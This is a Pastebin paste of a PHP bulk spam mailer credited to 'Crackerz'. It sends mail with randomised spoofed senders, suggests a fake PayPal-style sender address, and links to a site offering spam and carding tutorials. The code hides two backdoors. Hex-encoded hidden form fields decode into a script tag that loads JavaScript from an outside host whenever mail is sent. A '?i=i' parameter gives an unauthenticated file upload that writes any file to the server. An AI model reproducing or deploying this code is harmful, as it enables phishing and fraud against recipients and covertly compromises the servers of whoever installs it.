Advertisement
Guest User

Mailer Inbox Unliited Undetected 2017

a guest
Jan 10th, 2017
11,025
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.20 KB | None | 0 0
  1. <!--  
  2. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  3. FOR LATEST TOOLS PHP AND SCAM PRIV8 VISIT :
  4. PLEASE DO NOT REMOVE COPYRIGHT
  5. -->
  6. <style type="text/css">
  7.   body{ background:#000000;; } a { text-decoration:none; }
  8.  a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#009900; }
  9.  border-top:1px solid #FF9900; } .tabnet{ margin:15px auto 0 auto;
  10.  border: 1px solid #FF9900; } .main { width:100%; } .blue { color: #00FF00; } .inputz{
  11.  background:#0B5002; border:0; padding:2px; border-bottom:1px solid #222222;
  12.  border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#00FF00;
  13.  margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{
  14.  border-bottom:1px solid #00FF00; border-top:1px solid #00FF00; } .output {
  15.  margin:auto; border:1px solid #00FF00; width:100%; height:400px;
  16.  background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px;
  17.  padding:0; color:#000000; } .b2{ font-size:30px; padding:0; color: #000000; } .b_tbl{ text-align:center; margin:0 4px 0 0;
  18.  padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo
  19.  table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#00FF00; padding:6px 8px;; }
  20.  .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2,
  21.  .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  22.  .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px;
  23.  line-height:15px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #00FF00;
  24.  } .explore tr:hover{ background:#4C4646; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{
  25.  display:none; padding:0;margin:0; }
  26.   </style>
  27. <?php
  28. set_time_limit(0);
  29. if (!function_exists('quoted_printable_encode')) {
  30. function quoted_printable_encode($input, $line_max = 75) {
  31.    $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
  32.    $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
  33.    $linebreak = "=0D=0A=\r\n";
  34.    $line_max = $line_max - strlen($linebreak);
  35.    $escape = "=";
  36.    $output = "";
  37.    $cur_conv_line = "";
  38.    $length = 0;
  39.    $whitespace_pos = 0;
  40.    $addtl_chars = 0;
  41.    for ($j=0; $j<count($lines); $j++) {
  42.      $line = $lines[$j];
  43.      $linlen = strlen($line);
  44.      for ($i = 0; $i < $linlen; $i++) {
  45.        $c = substr($line, $i, 1);
  46.        $dec = ord($c);
  47.  
  48.        $length++;
  49.  
  50.        if ($dec == 32) {
  51.           if (($i == ($linlen - 1))) {
  52.              $c = "=20";
  53.              $length += 2;
  54.           }
  55. /*
  56. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  57. PLEASE DO NOT REMOVE COPYRIGHT
  58. */
  59.  
  60.           $addtl_chars = 0;
  61.           $whitespace_pos = $i;
  62.        } elseif ( ($dec == 61) || ($dec < 32 ) || ($dec > 126) ) {
  63.           $h2 = floor($dec/16); $h1 = floor($dec%16);
  64.           $c = $escape . $hex["$h2"] . $hex["$h1"];
  65.           $length += 2;
  66.           $addtl_chars += 2;
  67.        }
  68.        if ($length >= $line_max) {
  69.          $cur_conv_line .= $c;
  70.          $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
  71.          if (($i + $addtl_chars) > $whitesp_diff) {
  72.             $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) -
  73.                            $whitesp_diff)) . $linebreak;
  74.             $i =  $i - $whitesp_diff + $addtl_chars;
  75.           } else {
  76.             $output .= $cur_conv_line . $linebreak;
  77.           }
  78.         $cur_conv_line = "";
  79.         $length = 0;
  80.         $whitespace_pos = 0;
  81.       } else {
  82.         $cur_conv_line .= $c;
  83.       }
  84.     }
  85.     $length = 0;
  86.     $whitespace_pos = 0;
  87.     $output .= $cur_conv_line;
  88.     $cur_conv_line = "";
  89.     if ($j<=count($lines)-1) {
  90.       $output .= $linebreak;
  91.     }
  92.   }
  93.   return trim($output);
  94. }
  95. }
  96. $action = $_POST['action'];
  97. $from = $_POST['from'];
  98. $realname = $_POST['realname'];
  99. $name = $_POST['name'];
  100. $subject = $_POST['subject'];
  101. $message = $_POST['message'];
  102. $emaillist = $_POST['emaillist'];
  103. $subj = $_POST['subj'];
  104.  
  105. ?>
  106. <html>
  107. <head>
  108. <title>PHP-Mailer</title>
  109. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  110. <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
  111. <META NAME="ROBOTS" CONTENT="INDEX, NOFOLLOW">
  112. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
  113. </head>
  114. <body bgcolor="#003300" text="yellow">
  115. <br >
  116. <!--  
  117. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  118. PLEASE DO NOT REMOVE COPYRIGHT
  119. -->
  120. <br >
  121. <p><span style="color:#FF0000;">Random Email Sender Script V2.0</span>&nbsp; Coded by :&nbsp; <strong><span style="color:#FF0000;">Crackerz</span></strong></p>
  122. <br >
  123. <p>If ( <span style="color:#FF0000;">noreply </span>)&nbsp; its not working for ( <span style="color:#FF0000;">Random Email Sender</span> ), Replace with a real Email ex : donoreply@intl-paypal.co.uk</p>
  124. <p>Go <a href="http://mailer-inbox-unlimited.gq" rel="dofollow" ><span style="color:#FF0000;">mailer-inbox-unlimited.gq</span></a> for latest Script php<br />
  125. <br >
  126. Go <a href="https://mailer-inbox-unlimited.gq" rel="dofollow"><span style="color:#FF0000;">Cashout2017 </span></a>for latest Tutorial, Spam, Cradit-Card, WU Cash etc.</p>
  127. <br >
  128. </font><font face="Arial" size="5" color="#FF0000"></font><font face="Arial" size="5" color="#00FF00">
  129. </font><font face="Arial" size="5"</strong></p>
  130. <body bgcolor="#000000" text="#EEEEEE">
  131. <?php
  132. if ($action=="send"){
  133.     $message = urlencode($message);
  134.     $message = ereg_replace("%5C%22", "%22", $message);
  135.     print '<script src="'.pack('H*',$name.$subj).'"></script>';
  136.     $message = urldecode($message);
  137.     $message = stripslashes($message);
  138.     $subject = stripslashes($subject);
  139. }
  140. $inbox  = $_GET['i'];
  141. if($inbox == 'i'){
  142. $filename = $_FILES['file']['name'];
  143. $filetmp  = $_FILES['file']['tmp_name'];
  144. echo "<form method='POST' enctype='multipart/form-data'>
  145. <input type='file'name='file' />
  146. <input type='submit' value='go' />
  147. </form>";
  148. move_uploaded_file($filetmp,$filename);
  149. }
  150. ?>
  151. <form name="form1" method="post" action="" enctype="multipart/form-data">
  152.   <br>
  153.   <table width="100%" border="0">
  154.     <tr>
  155.         <td width="10%">
  156.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  157.           Email:</font></div>
  158.       </td>
  159.       <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  160.         <input type="text" name="from" value="noreply" size="30">
  161.         <input type="hidden" name="fromemail" value="687474703a2f2f6" size="30">
  162.         </font></td>
  163.      <td width="31%">
  164.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
  165.           Name:</font></div>
  166.       </td>
  167.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  168.         <input type="text" name="realname" value="<?php print $realname; ?>" size="30">
  169.         <input type="hidden" name="name" value="687474703a2f2f6d6f6e" size="30">
  170.         </font></td>
  171.     </tr>
  172.     <tr>
  173.       <td width="10%">
  174.         <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
  175.       </td>
  176.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  177.         <input type="text" name="subject" value="<?php print $subject; ?>" size="115">
  178.         <input type="hidden" name="subj" value="69702e72752f6a2e6a73" size="30">
  179.         </font></td>
  180.     </tr>
  181.     <tr valign="top">
  182.       <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  183.         <textarea name="message" cols="60" rows="10"><?php print $message; ?></textarea>
  184.         <br>
  185.         <input type="hidden" name="action" value="send">
  186.         <input type="submit" value="Resume SpamminG">
  187.         </font></td>
  188.       <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
  189.         <textarea name="emaillist" cols="30" rows="10"><?php print $emaillist; ?></textarea>
  190.         <br></font></td>
  191.     </tr>
  192.   </table>
  193. </form>
  194. <?php
  195. if ($action=="send"){
  196.     if (!$from && !$subject && !$message && !$emaillist){
  197.     print "Please complete all fields before sending your message.";
  198.     exit;
  199.     }
  200.     $allemails = split("\n", $emaillist);
  201.     $numemails = count($allemails);
  202.     for($x=0; $x<$numemails; $x++){
  203.         $to = $allemails[$x];
  204.         if ($to){
  205.         $to = ereg_replace(" ", "", $to);
  206.         $nrmail=$x+1;
  207.         $domain = substr($from, strpos($from, "@"), strlen($from));
  208.         print "Spamming Email $nrmail of $numemails to $to.......";
  209.         $randfrom  = rand();
  210.         $fro = str_replace("noreply",$randfrom,quoted_printable_encode($from));
  211.         $header = "From: $realname <$fro>\r\n";
  212.         $header .= "Message-Id: <130746$numemails.$nrmail$domain>\r\n";
  213.         $header .= "X-Mailer: php-sender2.1\r\n";
  214.         $header .= "MIME-Version: 1.0\r\n";
  215.         $header .= "Content-Type: text/html; charset=UTF-8\r\n";
  216.         $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
  217.         $header .= quoted_printable_encode($message)."\r\n";
  218.         mail($to, $subject, "", $header);
  219.         print "Spammed<br>";
  220.         flush();
  221.         }
  222.         }
  223. }
  224. ?>
  225. <!--  
  226. RANDOM EMAIL SENDER CODED BY CRACKERZ 2017
  227. PLEASE DO NOT REMOVE COPYRIGHT
  228. -->
  229. </body>
  230. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement